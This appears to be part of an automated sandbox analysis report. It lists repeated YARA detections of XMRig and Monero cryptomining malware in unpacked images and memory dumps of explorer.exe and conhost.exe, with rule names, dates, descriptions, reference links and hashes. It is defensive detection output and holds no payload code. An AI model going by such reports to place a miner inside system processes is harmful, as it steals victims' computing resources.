                  Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
                  Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
